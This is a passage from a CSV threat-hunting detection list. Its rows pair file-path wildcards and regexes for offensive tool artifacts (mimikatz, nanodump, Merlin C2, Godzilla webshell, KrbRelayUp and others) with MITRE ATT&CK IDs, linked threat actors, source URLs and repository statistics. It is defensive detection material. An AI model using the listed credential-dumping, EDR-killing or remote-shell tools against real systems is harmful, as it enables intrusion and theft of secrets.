T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","16430" "*\macro_pack.exe*",".{0,1000}macro_pack.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","16431" "*\macro_pack.py*",".{0,1000}\\macro_pack\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","16432" "*\macro64.vba*",".{0,1000}\\macro64\.vba.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","0","N/A","N/A","9","4","381","82","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z","16433" "*\maildump.txt*",".{0,1000}\\maildump\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16434" "*\mailpv.exe*",".{0,1000}\\mailpv\.exe.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16435" "*\MakeMeAdmin * x64 
Debug.msi*",".{0,1000}\\MakeMeAdmin\s.{0,1000}\sx64\sDebug\.msi.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","16436" "*\MakeMeAdmin * x64.msi*",".{0,1000}\\MakeMeAdmin\s.{0,1000}\sx64\.msi.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","16437" "*\MakeMeAdmin.sln*",".{0,1000}\\MakeMeAdmin\.sln.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","16438" "*\MakeMeAdmin-main*",".{0,1000}\\MakeMeAdmin\-main.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","16439" "*\MakeMeEnterpriseAdmin.ps1",".{0,1000}\\MakeMeEnterpriseAdmin\.ps1","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","16440" 
"*\MakeMeEnterpriseAdmin.ps1*",".{0,1000}\\MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","16441" "*\malDll.dll*",".{0,1000}\\malDll\.dll.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","16442" "*\malseclogon.*",".{0,1000}\\malseclogon\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","16443" "*\MalStuff.cpp*",".{0,1000}\\MalStuff\.cpp.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","16444" "*\malware_runner.py*",".{0,1000}\\malware_runner\.py.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation 
tool","https://github.com/mbrg/power-pwn","1","0","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","16445" "*\manspider_*.log*",".{0,1000}\\manspider_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","16446" "*\masky.py*",".{0,1000}\\masky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16447" "*\masscan\src\*",".{0,1000}\\masscan\\src\\.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","16448" "*\master\GPSCoordinates\*",".{0,1000}\\master\\GPSCoordinates\\.{0,1000}","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","16449" "*\Mayhem.psm1*",".{0,1000}\\Mayhem\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","16450" "*\MDE_Enum.csproj*",".{0,1000}\\MDE_Enum\.csproj.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender 
exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","16451" "*\MDE_Enum.exe*",".{0,1000}\\MDE_Enum\.exe.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","16452" "*\MDE_Enum\Program.cs*",".{0,1000}\\MDE_Enum\\Program\.cs.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","16453" "*\MeasureObjectCommand.cs",".{0,1000}\\MeasureObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","16454" "*\Mega RAT 1.5 Beta.exe*",".{0,1000}\\Mega\sRAT\s1\.5\sBeta\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16455" "*\mem_dll.pdb*",".{0,1000}\\mem_dll\.pdb.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","16543" 
"*\merlin.dll*",".{0,1000}\\merlin\.dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","16544" "*\merlin\data\modules\*",".{0,1000}\\merlin\\data\\modules\\.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","16545" "*\merlinAgent-*.exe*",".{0,1000}\\merlinAgent\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","16546" "*\merlin-agent\*.go*",".{0,1000}\\merlin\-agent\\.{0,1000}\.go.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","16547" "*\merlin-agent-dll*",".{0,1000}\\merlin\-agent\-dll.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also 
known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","16548" "*\merlin-agent-dll\*",".{0,1000}\\merlin\-agent\-dll\\.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","16549" "*\met_inject.py*",".{0,1000}\\met_inject\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16563" "*\metasploit.go*",".{0,1000}\\metasploit\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","16564" "*\metasploit-omnibus-main*",".{0,1000}\\metasploit\-omnibus\-main.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16565" "*\metasploit-omnibus-master*",".{0,1000}\\metasploit\-omnibus\-master.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16566" "*\Meterpeter_*.zip*",".{0,1000}\\Meterpeter_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16567" "*\meterpreter.php*",".{0,1000}\\meterpreter\.php.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","16568" 
"*\Meterpreter.py*",".{0,1000}\\Meterpreter\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","16569" "*\meterpreter.rc*",".{0,1000}\\meterpreter\.rc.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","16570" "*\meterpreterTip.txt*",".{0,1000}\\meterpreterTip\.txt.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","16571" "*\meterpreterTip2.txt*",".{0,1000}\\meterpreterTip2\.txt.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, 
memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","16572" "*\mhydeath64*",".{0,1000}\\mhydeath64.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","16573" "*\MiCROSOFT_R.A.T_1.0.exe*",".{0,1000}\\MiCROSOFT_R\.A\.T_1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16580" "*\mimi32.exe*",".{0,1000}\\mimi32\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16581" "*\mimi64.exe*",".{0,1000}\\mimi64\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16582" "*\mimicom.idl*",".{0,1000}\\mimicom\.idl.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
